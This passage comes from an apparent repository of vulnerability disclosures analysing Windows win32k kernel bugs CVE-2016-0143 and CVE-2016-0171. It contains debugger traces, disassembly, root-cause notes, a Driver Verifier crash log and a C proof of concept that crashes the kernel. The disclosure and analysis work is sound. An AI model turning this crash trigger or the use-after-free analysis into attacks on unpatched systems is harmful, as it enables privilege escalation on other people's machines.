user32!NtUserDrawMenuBarTemp+0xa 76 | 08 00000000`0020fa20 00000001`3fa8144a user32!DrawMenuBarTemp+0x5f 77 | 09 00000000`0020fa60 00000001`3fa9d2fc 0x00000001`3fa8144a 78 | 0a 00000000`0020fa68 00000000`00000000 0x00000001`3fa9d2fc 79 | 1: kd> bl 80 | 0 d fffff960`0022bf74 e 1 0001 (0001) win32k!xxxDrawState 81 | 1 e fffff880`15bae4f8 w 1 0001 (0001) 82 | 2 e fffff960`0022c54e e 1 0001 (0001) win32k!xxxDrawState+0x5da 83 | 84 | Latest result: I can monitor all writes to the vulnerable stack slot; there is a lot of them, both from HmgLockEx() surrounding internals and debugger internals. The slot is nulled if I put bp before entrance to xxxRealDrawMenuItem(), not nulled if only bp on memory. 85 | 86 | 87 | -?- Can I manipulate the write address (uninitialized variable) and how? 88 | -?- Is it possible to put arbitrary value into the uninitialized variable via program's logic, eg. by manipulating the PoC values? 89 | 90 | No: 91 | 1. The culprit uninitialized variable is (by design) expected to hold a pointer. 92 | 2. The only way to initialize the variable via program's logic is inside GreCreateDIBitmapReal() function. 93 | 3. Inside the GreCreateDIBitmapReal(), the variable *can possibly* be initialized via following logic: 94 | GreCreateDIBitmapReal() -> SURFMEM::bCreateDIB() -> AllocateObject(), which puts the pointer into the culprit variable. 95 | 4. The code of AllocateObject() basically tries to allocate memory in three ways: 96 | ExAllocateFromPagedLookasideList(x), PALLOCMEM(), Win32AllocPool(), 97 | ie. either from the Lookaside List or directly from the pool, 98 | and it will return either a valid pointer or NULL if it failed to allocate. 99 | 5. Hence in theory, we could only manipulate the logic to get a valid free memory pointer, which is equivalent to normal program execution and hence would render the bug useless. 100 | 101 | Thus, the bug in theory is not exploitable, because the buggy pointer can only reference historical data on the stack: 102 | 1. NULL 103 | This was possible to exploit only on earlier versions of Windows by allocating the NULL page in kernel, but it's not possible to CVE date. 104 | 2. HmgLockEx() address (persistent on Windows 7 x64). 105 | 106 | 107 | -?- What exactly does the PoC do? 108 | 109 | 110 | -?- What is the Windows procedure for kernel bugs handling / bugcheck? 111 | 112 | Really basics: http://www.osronline.com/article.cfm?article=82 113 | More basics: http://social.technet.microsoft.com/wiki/contents/articles/6302.windows-bugcheck-analysis.aspx 114 | 115 | 116 | -?- What do BSOD numbers mean? 117 | 118 | Reference: https://msdn.microsoft.com/en-us/library/windows/hardware/hh994433(v=vs.85).aspx 119 | bugcodes.h 120 | !analyze -show Code 121 | 122 | Favorites: 123 | FAT_FILE_SYSTEM 124 | FLOPPY_INTERNAL_ERROR 125 | IMPERSONATING_WORKER_THREAD 126 | INSTALL_MORE_MEMORY 127 | 128 | 129 | -?- What is the bug's root cause? The pattern? Similar bug vectors ideas? 130 | 131 | Indeed the root cause is uninitialized stack variable in xxxRealDrawMenuItem(): in the vulnerable code, it's passed to GreCreateDIBitmapReal() without being initialized, while in the patched code it's nulled prior to any use: 132 | 133 | .text:BF907601 mov [ebp+var_1C], edi 134 | .text:BF907604 call _GreCreateCompatibleDC@4 ; GreCreateCompatibleDC(x) 135 | .text:BF907609 mov [ebp+arg_C], eax 136 | .text:BF90760C cmp eax, edi 137 | .text:BF90760E jz loc_BF907731 138 | .text:BF907614 push 2Ch ; size_t 139 | .text:BF907616 lea eax, [ebp+var_68] 140 | .text:BF907619 push edi ; int 141 | .text:BF90761A push eax ; void * 142 | .text:BF90761B call _memset 143 | .text:BF907620 mov eax, [ebp+arg_8] 144 | .text:BF907623 add esp, 0Ch 145 | .text:BF907626 push 20h 146 | .text:BF907628 mov [ebp+var_64], eax 147 | .text:BF90762B xor eax, eax 148 | .text:BF90762D inc eax 149 | .text:BF90762E mov [ebp+var_5C], ax 150 | .text:BF907632 pop eax 151 | .text:BF907633 mov [ebp+var_5A], ax 152 | .text:BF907637 lea eax, [ebp+var_1C] 153 | .text:BF90763A push eax ; int 154 | .text:BF90763B push edi ; int 155 | .text:BF90763C push edi ; char 156 | .text:BF90763D push edi ; int 157 | .text:BF90763E push edi ; int 158 | .text:BF90763F push edi ; int 159 | .text:BF907640 push edi ; int 160 | .text:BF907641 push 2Ch ; int 161 | .text:BF907643 push edi ; int 162 | .text:BF907644 lea eax, [ebp+var_68] 163 | .text:BF907647 push eax ; int 164 | .text:BF907648 push edi ; Section 165 | .text:BF907649 push edi ; int 166 | .text:BF90764A push [ebp+arg_C] ; int 167 | .text:BF90764D mov [ebp+var_68], 28h 168 | .text:BF907654 mov [ebp+var_60], ebx 169 | .text:BF907657 mov [ebp+var_58], edi 170 | .text:BF90765A call _GreCreateDIBitmapReal@52 ; GreCreateDIBitmapReal(x,x,x,x,x,x,x,x,x,x,x,x,x) 171 | 172 | The pattern: a read reference to a function's stack variable comes prior to the write reference, in the function's call graph linear time. Not very useful as a bug hunting vector, bc manipulating the stack will not be stable exploitation wise. 173 | 174 | 175 | -?- Why exactly is the variable not initialized, in terms of the PoC? How should it be initialized normally? 176 | 177 | While the bug's root cause is the lack of a local variable initialization within the xxxRealDrawMenuItem() function, the de-facto culprit is GreCreateDIBitmapReal() function, which is the first entity to operate on the uninitialized variable. From the code graph we can see that GreCreateDIBitmapReal() function sets the variable in most cases, otherwise it returns NULL. In most cases when it returns NULL, it will also set the error code to 0x57, that is ERROR_INVALID_PARAMETER. 178 | 179 | Therefore, the bug is observed due to a combination of two programming errors, both of which were patched. 180 | In terms of bug triggering, it is required that xxxRealDrawMenuItem() would pass an invalid parameter to GreCreateDIBitmapReal(). 181 | 182 | Windows error codes: https://msdn.microsoft.com/ru-ru/library/windows/desktop/ms681382(v=vs.85).aspx 183 | 184 | 185 | -?- Why do KD internals null the stack? How do they work? 186 | 187 | 188 | -?- Why does the bp get looped and in what exactly conditions? 189 | 190 | 191 | -?- Who calls HmgLockEx()? 192 | 193 | xxxDrawMenuItem() -> xxxDrawState() -> GreSetLayout() -> DCOBJ::DCOBJ() -> XDCOBJ::vLock() -> HmgLockEx() -> HANDLELOCK::~HANDLELOCK() 194 | ...-> xxxRealDrawMenuItem() 195 | There is a set of Hmg* functions in the kernel, and they seem to be responsible for Handle ManaGement. 196 | HmgLockEx either locks or unlocks the given handle, according the the arguments. 197 | HmgLockEx+122 is the return address from HANDLELOCK::~HANDLELOCK destructor near end of the x64 HmgLockEx() procedure, which is by the way very different from the x32 version of the same function. 198 | 199 | 0: kd> ba e1 hmglockex+122 200 | 0: kd> g 201 | Breakpoint 2 hit 202 | win32k!HmgLockEx+0x122: 203 | fffff960`001179a2 4c8d5c2450 lea r11,[rsp+50h] 204 | 0: kd> k 205 | # Child-SP RetAddr Call Site 206 | 00 fffff880`13576520 fffff960`00118fce win32k!HmgLockEx+0x122 207 | 01 fffff880`13576590 fffff960`0023bc56 win32k!XDCOBJ::vLock+0x1e 208 | 02 fffff880`135765c0 fffff960`001cc4fc win32k!GreSetLayout+0x2a 209 | 03 fffff880`13576600 fffff960`00186dd6 win32k!xxxDrawState+0x588 210 | 04 fffff880`13576770 fffff960`0018847e win32k!xxxDrawMenuItem+0x516 211 | 05 fffff880`13576830 fffff960`00188db6 win32k!xxxMenuDraw+0x346 212 | 06 fffff880`13576900 fffff960`001355cb win32k!xxxDrawMenuBarTemp+0x2aa 213 | 07 fffff880`135769e0 fffff800`016bc613 win32k!NtUserDrawMenuBarTemp+0xe7 214 | 08 fffff880`13576a70 00000000`772fae6a nt!KiSystemServiceCopyEnd+0x13 215 | 09 00000000`0019f6f8 00000000`773407c7 0x772fae6a 216 | 0a 00000000`0019f700 00000000`00010197 0x773407c7 217 | 0b 00000000`0019f708 00000000`00000000 0x10197 218 | 219 | 220 | -?- Who nulls the HmgLockEx return address on the stack? Or is it not called? 221 | 222 | The HmgLockEx() function is definitely called every time, including the null crase case, as we can see by setting a bp on GreSetLayout() and bp HmgLockEx from there. 223 | In some cases a random number will appear in the culprit memory slot, causing a different crash: 224 | 225 | win32k!xxxRealDrawMenuItem+0x6b0: 226 | fffff960`0018755c 410fb64801 movzx ecx,byte ptr [r8+1] ds:002b:00000000`00000019=?? 227 | 228 | 0: kd> dqs fffff880`135764f8 l1 229 | fffff880`135764f8 00000000`00000018 230 | 231 | Hence someone is corrupting the stack to cause a null crash. 232 | 233 | Let's calculate the exact location of the culprit stack slot: 234 | fffff880`135715f8 - ret address of xxxDrawState 235 | 236 | 0: kd> ? fffff880`135715f8-fffff880`135714f8 237 | Evaluate expression: 256 = 00000000`00000100 238 | 0: kd> dqs fffff880`135715f8-100 l1 239 | fffff880`135714f8 fffff960`001279a2 win32k!HmgLockEx+0x122 240 | 241 | 242 | It's nt!KxContextToKframes(), related to debugging: 243 | 244 | Breakpoint 2 hit 245 | nt!KxContextToKframes+0x1ea: 246 | fffff800`016b44aa 488b83d0010000 mov rax,qword ptr [rbx+1D0h] 247 | 1: kd> k 248 | # Child-SP RetAddr Call Site 249 | 00 fffff880`133beac0 fffff800`0168c533 nt!KxContextToKframes+0x1ea 250 | 01 fffff880`133beb00 fffff800`016c7a51 nt!KeContextToKframes+0x83 251 | 02 fffff880`133bebe0 fffff800`0168ba02 nt!KiDispatchException+0x155 252 | 03 fffff880`133bf280 fffff800`016893a2 nt!KiExceptionDispatch+0xc2 253 | 04 fffff880`133bf460 fffff960`001b6eac nt!KiDebugTrapOrFault+0x1a2 254 | 05 fffff880`133bf5f8 fffff960`001fc55b win32k!xxxRealDrawMenuItem 255 | 06 fffff880`133bf600 fffff960`001b6dd6 win32k!xxxDrawState+0x5e7 256 | 07 fffff880`133bf770 fffff960`001b847e win32k!xxxDrawMenuItem+0x516 257 | 08 fffff880`133bf830 fffff960`001b8db6 win32k!xxxMenuDraw+0x346 258 | 09 fffff880`133bf900 fffff960`001655cb win32k!xxxDrawMenuBarTemp+0x2aa 259 | 0a fffff880`133bf9e0 fffff800`0168b613 win32k!NtUserDrawMenuBarTemp+0xe7 260 | 0b fffff880`133bfa70 00000000`76d1ae6a nt!KiSystemServiceCopyEnd+0x13 261 | 0c 00000000`0012f778 00000000`76d607c7 user32!NtUserDrawMenuBarTemp+0xa 262 | 0d 00000000`0012f780 00000001`3fca144a user32!DrawMenuBarTemp+0x5f 263 | 0e 00000000`0012f7c0 00000001`3fcbd2fc 0x00000001`3fca144a 264 | 0f 00000000`0012f7c8 00000000`00000000 0x00000001`3fcbd2fc 265 | 1: kd> dqs fffff880`133bf4f8 l1 266 | fffff880`133bf4f8 00000000`00000000 267 | 1: kd> ? rax 268 | Evaluate expression: 0 = 00000000`00000000 269 | 270 | Next the null-crash occurs, and the stack slot is never touched again. 271 | 272 | From the WRK: 273 | 274 | 237 PXMM_SAVE_AREA32 275 | 238 KxContextToKframes ( 276 | 239 __inout PKTRAP_FRAME TrapFrame, 277 | 240 __inout PKEXCEPTION_FRAME ExceptionFrame, 278 | 241 __in PCONTEXT ContextRecord, 279 | 242 __in ULONG ContextFlags, 280 | 243 __in KPROCESSOR_MODE PreviousMode 281 | 244 ) 282 | 245 283 | 246 /*++ 284 | 247 285 | 248 Routine Description: 286 | 249 287 | 250 This routine moves the selected contents of the specified context frame 288 | 251 into the specified trap and exception frames according to the specified 289 | 252 context flags. 290 | 253 291 | 254 Arguments: 292 | 255 293 | 256 TrapFrame - Supplies a pointer to a trap frame that receives the volatile 294 | 257 context from the context record. 295 | 258 296 | 259 ExceptionFrame - Supplies a pointer to an exception frame that receives 297 | 260 the nonvolatile context from the context record. 298 | 261 299 | 262 ContextRecord - Supplies a pointer to a context frame that contains the 300 | 263 context that is to be copied into the trap and exception frames. 301 | 264 302 | 265 ContextFlags - Supplies the set of flags that specify which parts of the 303 | 266 context frame are to be copied into the trap and exception frames. 304 | 267 305 | 268 PreviousMode - Supplies the processor mode for which the exception and 306 | 269 trap frames are being built. 307 | 270 308 | 271 Return Value: 309 | 272 310 | 273 If the context operation is a set context and the legacy floating state is 311 | 274 switched for the current thread, then the address of the legacy floating 312 | 275 save area is returned as the function value. Otherwise, NULL is returned. 313 | 276 314 | 277 --*/ 315 | 316 | http://gate.upm.ro/os/LABs/Windows_OS_Internals_Curriculum_Resource_Kit-ACADEMIC/WindowsResearchKernel-WRK/WRK-v1.2/base/ntos/ke/amd64/exceptn.c 317 | 318 | 319 | +++++++++ 320 | 321 | KASLR fortune-telling. 322 | 1. Set a few kernel break-points according to your situation. 323 | 2. Reset the box to shuffle the symbols. 324 | 3. Read the telling. 325 | -------------------------------------------------------------------------------- /CVE-2016-0143_win32k/screens/xxxRealDrawMenuItem_1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2016-0143_win32k/screens/xxxRealDrawMenuItem_1.jpeg -------------------------------------------------------------------------------- /CVE-2016-0143_win32k/screens/xxxRealDrawMenuItem_2.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2016-0143_win32k/screens/xxxRealDrawMenuItem_2.jpeg -------------------------------------------------------------------------------- /CVE-2016-0143_win32k/screens/xxxRealDrawMenuItem_3.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2016-0143_win32k/screens/xxxRealDrawMenuItem_3.jpeg -------------------------------------------------------------------------------- /CVE-2016-0143_win32k/testcase.c: -------------------------------------------------------------------------------- 1 | /* 2 | * cl.exe poc.cpp user32.lib gdi32.lib 3 | */ 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | typedef NTSTATUS __stdcall DrawMenuBarTemp_T(HWND arg0, 10 | HDC arg1, 11 | RECT *arg2, 12 | HMENU arg3, 13 | HFONT arg4); 14 | 15 | int _tmain(int argc, _TCHAR* argv[]) { 16 | DrawMenuBarTemp_T * pfnDrawMenuBarTemp = 0; 17 | pfnDrawMenuBarTemp = (DrawMenuBarTemp_T *)GetProcAddress( 18 | GetModuleHandleA("user32.dll"), "DrawMenuBarTemp"); 19 | 20 | HDC hdc1 = CreateCompatibleDC((HDC)0xbeef); 21 | printf("[-] hdc1: %08x\n", hdc1); 22 | HDC hdc2 = CreateCompatibleDC(hdc1); 23 | printf("[-] hdc2: %08x\n", hdc2); 24 | 25 | BITMAPINFO info; 26 | memset(&info, 0, sizeof(info)); 27 | 28 | info.bmiHeader.biSize = sizeof(BITMAPINFOHEADER); 29 | info.bmiHeader.biWidth = 0x9d; 30 | info.bmiHeader.biHeight = 0xfe; 31 | info.bmiHeader.biBitCount = 0x20; 32 | info.bmiHeader.biCompression = 0; 33 | info.bmiHeader.biSizeImage = 0xb4; 34 | info.bmiHeader.biXPelsPerMeter = 0x8d; 35 | info.bmiHeader.biYPelsPerMeter = 0x0; 36 | info.bmiHeader.biClrUsed = 0x75; 37 | info.bmiHeader.biClrImportant = 0x32; 38 | info.bmiHeader.biPlanes = 1; 39 | 40 | PVOID ptr; 41 | 42 | //HANDLE handle1 = NtGdiCreateDIBSection((HANDLE)0xbeef, 0, 0, (PVOID)&info, 1, sizeof(info.bmiHeader), 0x4, 0, &ptr); 43 | HANDLE handle1 = CreateDIBSection((HDC)0xbeef, &info, 1, (void**)&ptr, 0, 0); 44 | printf("[-] handle1: %08x\n", handle1); 45 | 46 | HMENU hmenu1 = CreatePopupMenu(); 47 | printf("[-] hmenu1: %08x\n", hmenu1); 48 | 49 | HMENU hmenu2 = CreatePopupMenu(); 50 | printf("[-] hmenu2: %08x\n", hmenu1); 51 | 52 | InsertMenuW(hmenu2, 0xd, 0x54, (UINT_PTR)hmenu1, (LPCWSTR)0xbeef); 53 | InsertMenuW(hmenu1, 0xd, 0x15, (UINT_PTR)hmenu2, (LPCWSTR)handle1); 54 | 55 | HWND hwnd1 = GetDesktopWindow(); 56 | printf("[-] hwnd1: %08x\n", hwnd1); 57 | 58 | InsertMenuW(hmenu2, 0xf, 0x47, 0x69, (LPCWSTR)handle1); 59 | 60 | RECT r; 61 | r.top = 0x9d; 62 | r.bottom = 0x80000007; 63 | r.left = 0x27; 64 | r.right = 0x76; 65 | pfnDrawMenuBarTemp(hwnd1, hdc2, &r, hmenu2, (HFONT)0xbeef); 66 | } -------------------------------------------------------------------------------- /CVE-2016-0171_win32k/README.md: -------------------------------------------------------------------------------- 1 | # Disclosure Note 2 | 3 | CVE-2016-0171: Microsoft Win32k Elevation of Privilege Vulnerability 4 | 5 | ### Credits 6 | 7 | Vulnerability discovery: Nils Sommer 8 | Vulnerability analysis: Alisa Esage 9 | -------------------------------------------------------------------------------- /CVE-2016-0171_win32k/bin/files.patched/win32k.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2016-0171_win32k/bin/files.patched/win32k.sys -------------------------------------------------------------------------------- /CVE-2016-0171_win32k/bin/files.vulnerable/gdi32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2016-0171_win32k/bin/files.vulnerable/gdi32.dll -------------------------------------------------------------------------------- /CVE-2016-0171_win32k/bin/files.vulnerable/win32k.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alisaesage/Disclosures/7d7ad5710eebd1da4cd3d949f8c26070e5d9b7cc/CVE-2016-0171_win32k/bin/files.vulnerable/win32k.sys -------------------------------------------------------------------------------- /CVE-2016-0171_win32k/logs/bugcheck.txt: -------------------------------------------------------------------------------- 1 | ******************************************************************************* 2 | * 3 | * This is the string you add to your checkin description 4 | * Driver Verifier: Enabled for win32k.sys on Build 7601 Swoke0cxHt9I3y4CfWvmAH 5 | * 6 | ******************************************************************************* 7 | 8 | *** Fatal System Error: 0x000000d5 9 | (0xFC11C994,0x00000000,0x8D5062C6,0x00000000) 10 | 11 | Driver at fault: 12 | *** win32k.sys - Address 8D5062C6 base at 8D430000, DateStamp 56422bfd 13 | . 14 | Break instruction exception - code 80000003 (first chance) 15 | 16 | A fatal system error has occurred. 17 | Debugger entered on first try; Bugcheck callbacks have not been invoked. 18 | 19 | A fatal system error has occurred. 20 | 21 | Connected to Windows 7 7601 x86 compatible target at (Fri Feb 19 11:23:33.017 2016 (UTC - 8:00)), ptr64 FALSE 22 | Loading Kernel Symbols 23 | ............................................................... 24 | ............................................ 25 | 26 | Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long. 27 | Run !sym noisy before .reload to track down problems loading symbols. 28 | 29 | .................... 30 | ....... 31 | Loading User Symbols 32 | ......................... 33 | Loading unloaded module list 34 | .....*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - 35 | 36 | ******************************************************************************* 37 | * * 38 | * Bugcheck Analysis * 39 | * * 40 | ******************************************************************************* 41 | 42 | Use !analyze -v to get detailed debugging information. 43 | 44 | BugCheck D5, {fc11c994, 0, 8d5062c6, 0} 45 | 46 | *** WARNING: Unable to verify checksum for c7.exe 47 | *** ERROR: Module load completed but symbols could not be loaded for c7.exe 48 | Unable to open image file: C:\Program Files\Debugging Tools for Windows (x86)\sym\win32k.sys\56422BFD25a000\win32k.sys 49 | The system cannot find the file specified. 50 | 51 | Unable to open image file: C:\Program Files\Debugging Tools for Windows (x86)\sym\win32k.sys\56422BFD25a000\win32k.sys 52 | The system cannot find the file specified. 53 | 54 | Unable to open image file: C:\Program Files\Debugging Tools for Windows (x86)\sym\win32k.sys\56422BFD25a000\win32k.sys 55 | The system cannot find the file specified. 56 | 57 | Probably caused by : win32k.sys ( win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+3d ) 58 | 59 | Followup: MachineOwner 60 | --------- 61 | 62 | nt!RtlpBreakWithStatusInstruction: 63 | 82c80308 cc int 3 64 | 1: kd> !analyze -v 65 | ******************************************************************************* 66 | * * 67 | * Bugcheck Analysis * 68 | * * 69 | ******************************************************************************* 70 | 71 | DRIVER_PAGE_FAULT_IN_FREED_SPECIAL_POOL (d5) 72 | Memory was referenced after it was freed. 73 | This cannot be protected by try-except. 74 | When possible, the guilty driver's name (Unicode string) is printed on 75 | the bugcheck screen and saved in KiBugCheckDriver. 76 | Arguments: 77 | Arg1: fc11c994, memory referenced 78 | Arg2: 00000000, value 0 = read operation, 1 = write operation 79 | Arg3: 8d5062c6, if non-zero, the address which referenced memory. 80 | Arg4: 00000000, (reserved) 81 | 82 | Debugging Details: 83 | ------------------ 84 | 85 | Unable to open image file: C:\Program Files\Debugging Tools for Windows (x86)\sym\win32k.sys\56422BFD25a000\win32k.sys 86 | The system cannot find the file specified. 87 | 88 | Unable to open image file: C:\Program Files\Debugging Tools for Windows (x86)\sym\win32k.sys\56422BFD25a000\win32k.sys 89 | The system cannot find the file specified. 90 | 91 | Unable to open image file: C:\Program Files\Debugging Tools for Windows (x86)\sym\win32k.sys\56422BFD25a000\win32k.sys 92 | The system cannot find the file specified. 93 | 94 | 95 | READ_ADDRESS: fc11c994 Special pool 96 | 97 | FAULTING_IP: 98 | win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+3d 99 | 8d5062c6 ff7114 push dword ptr [ecx+14h] 100 | 101 | MM_INTERNAL_CODE: 0 102 | 103 | IMAGE_NAME: win32k.sys 104 | 105 | DEBUG_FLR_IMAGE_TIMESTAMP: 56422bfd 106 | 107 | MODULE_NAME: win32k 108 | 109 | FAULTING_MODULE: 8d430000 win32k 110 | 111 | DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT 112 | 113 | BUGCHECK_STR: 0xD5 114 | 115 | PROCESS_NAME: c7.exe 116 | 117 | CURRENT_IRQL: 2 118 | 119 | TRAP_FRAME: 96187b6c -- (.trap 0xffffffff96187b6c) 120 | ErrCode = 00000000 121 | eax=fef4a728 ebx=00000000 ecx=fc11c980 edx=00000000 esi=96187c10 edi=00001000 122 | eip=8d5062c6 esp=96187be0 ebp=96187bfc iopl=0 nv up ei ng nz na pe nc 123 | cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286 124 | win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+0x3d: 125 | 8d5062c6 ff7114 push dword ptr [ecx+14h] ds:0023:fc11c994=???????? 126 | Resetting default scope 127 | 128 | LAST_CONTROL_TRANSFER: from 82ce4ce7 to 82c80308 129 | 130 | STACK_TEXT: 131 | 961876bc 82ce4ce7 00000003 e7c04cd9 00000065 nt!RtlpBreakWithStatusInstruction 132 | 9618770c 82ce57e5 00000003 00000000 ffffffff nt!KiBugCheckDebugBreak+0x1c 133 | 96187ad0 82c933c1 00000050 fc11c994 00000000 nt!KeBugCheck2+0x68b 134 | 96187b54 82c45be8 00000000 fc11c994 00000000 nt!MmAccessFault+0x104 135 | 96187b54 8d5062c6 00000000 fc11c994 00000000 nt!KiTrap0E+0xdc 136 | 96187bfc 8d507e76 042106de 8d4e4fab 0035fc44 win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+0x3d 137 | 96187ccc 8d4e4fda 042106de 00000062 00000055 win32k!NtGdiBitBltInternal+0x73b 138 | 96187d00 82c42a06 042106de 00000062 00000055 win32k!NtGdiBitBlt+0x2f 139 | 96187d00 776971b4 042106de 00000062 00000055 nt!KiSystemServicePostCall 140 | WARNING: Stack unwind information not available. Following frames may be wrong. 141 | 0035fc54 00091399 00566898 00000062 00000055 ntdll!KiFastSystemCallRet 142 | 0035fc90 000915e3 00000001 00548ab8 00550b40 c7+0x1399 143 | 0035fcdc 766eee6c 7ffdf000 0035fd28 776b3ab3 c7+0x15e3 144 | 0035fce8 776b3ab3 7ffdf000 7747c3f9 00000000 kernel32!BaseThreadInitThunk+0xe 145 | 0035fd28 776b3a86 00091660 7ffdf000 00000000 ntdll!RtlInitializeExceptionChain+0xef 146 | 0035fd40 00000000 00091660 7ffdf000 00000000 ntdll!RtlInitializeExceptionChain+0xc2 147 | 148 | 149 | STACK_COMMAND: kb 150 | 151 | FOLLOWUP_IP: 152 | win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+3d 153 | 8d5062c6 ff7114 push dword ptr [ecx+14h] 154 | 155 | SYMBOL_STACK_INDEX: 5 156 | 157 | SYMBOL_NAME: win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+3d 158 | 159 | FOLLOWUP_NAME: MachineOwner 160 | 161 | FAILURE_BUCKET_ID: 0xD5_VRF_win32k!DEVLOCKBLTOBJ::_DEVLOCKBLTOBJ+3d 162 | 163 | BUCKET_ID: 0xD5_VRF_win32k!DEVLOCKBLTOBJ::_DEVLOCKBLTOBJ+3d 164 | 165 | Followup: MachineOwner 166 | --------- 167 | 168 | -------------------------------------------------------------------------------- /CVE-2016-0171_win32k/notes.txt: -------------------------------------------------------------------------------- 1 | KB Windows 7 x86: 2 | July 3618965 3 | May (original) 3153199 3156017 4 | 5 | CVE-2016-0171 vulnerability analysis 6 | 7 | Triggers on Windows 7 x32, only with Special pool enabled. The PoC is only available for x32, but it should be possible to port for x64. 8 | Basically it�s a use after free, the freed pointer looks like a handle to a Bitmap. 9 | The crash occures inside a destructor that apparently was provided with a buffer with an already freed pointer inside. 10 | Overall the bug looks interesting. The only obstruction to exploitation can be that the free/re-use window is too small, but I don�t see that�s the case. 11 | 12 | win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ: 13 | 983e5f8c 8bff mov edi,edi 14 | 983e5f8e 55 push ebp 15 | 983e5f8f 8bec mov ebp,esp 16 | 983e5f91 51 push ecx 17 | 983e5f92 51 push ecx 18 | 983e5f93 56 push esi 19 | 983e5f94 57 push edi 20 | 983e5f95 8bf1 mov esi,ecx <� freed pointer inside already? 21 | 983e5f97 bf00100000 mov edi,1000h 22 | 983e5f9c 857e24 test dword ptr [esi+24h],edi 23 | 983e5f9f 740c je win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+0x21 (983e5fad) 24 | 983e5fa1 e81b460000 call win32k!DEVLOCKBLTOBJ::vUnMap (983ea5c1) 25 | 983e5fa6 8bce mov ecx,esi 26 | 983e5fa8 e8db450000 call win32k!DEVLOCKBLTOBJ::vFlushSpriteUpdates (983ea588) 27 | 983e5fad 53 push ebx 28 | 983e5fae 8d4614 lea eax,[esi+14h] 29 | 983e5fb1 33db xor ebx,ebx 30 | 983e5fb3 8945fc mov dword ptr [ebp-4],eax <� stored address of the crashing ptr 31 | 983e5fb6 3918 cmp dword ptr [eax],ebx 32 | 983e5fb8 743d je win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+0x6b (983e5ff7) 33 | 983e5fba 8b4620 mov eax,dword ptr [esi+20h] 34 | 983e5fbd 3918 cmp dword ptr [eax],ebx 35 | 983e5fbf 7412 je win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+0x47 (983e5fd3) 36 | 983e5fc1 8b4e1c mov ecx,dword ptr [esi+1Ch] 37 | 983e5fc4 8b00 mov eax,dword ptr [eax] 38 | 983e5fc6 53 push ebx 39 | 983e5fc7 6a01 push 1 40 | 983e5fc9 ff7114 push dword ptr [ecx+14h] <� crash here due to freed mem access 41 | 983e5fcc ff30 push dword ptr [eax] 42 | 983e5fce e8ea7dffff call win32k!hbmSelectBitmap (983dddbd) <� looks like it�s a freed bitmap handle 43 | 983e5fd3 8b45fc mov eax,dword ptr [ebp-4] 44 | 983e5fd6 8b00 mov eax,dword ptr [eax] 45 | 983e5fd8 3bc3 cmp eax,ebx 46 | 983e5fda 7406 je win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+0x56 (983e5fe2) 47 | 983e5fdc 50 push eax 48 | 983e5fdd e81af3feff call win32k!DEC_SHARE_REF_CNT (983d52fc) 49 | 983e5fe2 8b45fc mov eax,dword ptr [ebp-4] 50 | 983e5fe5 8b00 mov eax,dword ptr [eax] 51 | 983e5fe7 ff7014 push dword ptr [eax+14h] <� use 52 | 983e5fea e84713feff call win32k!bDeleteSurface (983c7336) 53 | 983e5fef 8b45fc mov eax,dword ptr [ebp-4] 54 | 983e5ff2 8918 mov dword ptr [eax],ebx 55 | 983e5ff4 895e20 mov dword ptr [esi+20h],ebx 56 | 983e5ff7 8b4624 mov eax,dword ptr [esi+24h] 57 | 983e5ffa 85c7 test edi,eax 58 | 983e5ffc 7452 je win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+0xc4 (983e6050) 59 | 983e5ffe 8bce mov ecx,esi 60 | 983e6000 a900800000 test eax,8000h 61 | 62 | kd> kb 63 | *** Stack trace for last set context - .thread/.cxr resets it 64 | # ChildEBP RetAddr Args to Child 65 | 00 aba3fafc 983e7b6d 592106c9 983c4dcb 002bfda4 win32k!DEVLOCKBLTOBJ::~DEVLOCKBLTOBJ+0x3d 66 | 01 aba3fbcc 983c4dfa 592106c9 00000062 00000055 win32k!NtGdiBitBltInternal+0x73b 67 | 02 aba3fc00 8184ea06 592106c9 00000062 00000055 win32k!NtGdiBitBlt+0x2f 68 | 03 aba3fc00 771971b4 592106c9 00000062 00000055 nt!KiSystemServicePostCall 69 | 04 002bfd6c 75507349 75507331 592106c9 00000062 ntdll!KiFastSystemCallRet 70 | 05 002bfd70 75507331 592106c9 00000062 00000055 GDI32!NtGdiBitBlt+0xc 71 | 06 002bfdb4 00f81399 00420eb8 00000062 00000055 GDI32!BitBlt+0x1fa 72 | WARNING: Stack unwind information not available. Following frames may be wrong. 73 | 07 002bfdf0 00f815e3 00000001 004003e8 00400420 poc_p3_04+0x1399 74 | 08 002bfe3c 7730ee6c 7ffdf000 002bfe88 771b3ab3 poc_p3_04+0x15e3 75 | 09 002bfe48 771b3ab3 7ffdf000 770cd107 00000000 kernel32!BaseThreadInitThunk+0xe 76 | 0a 002bfe88 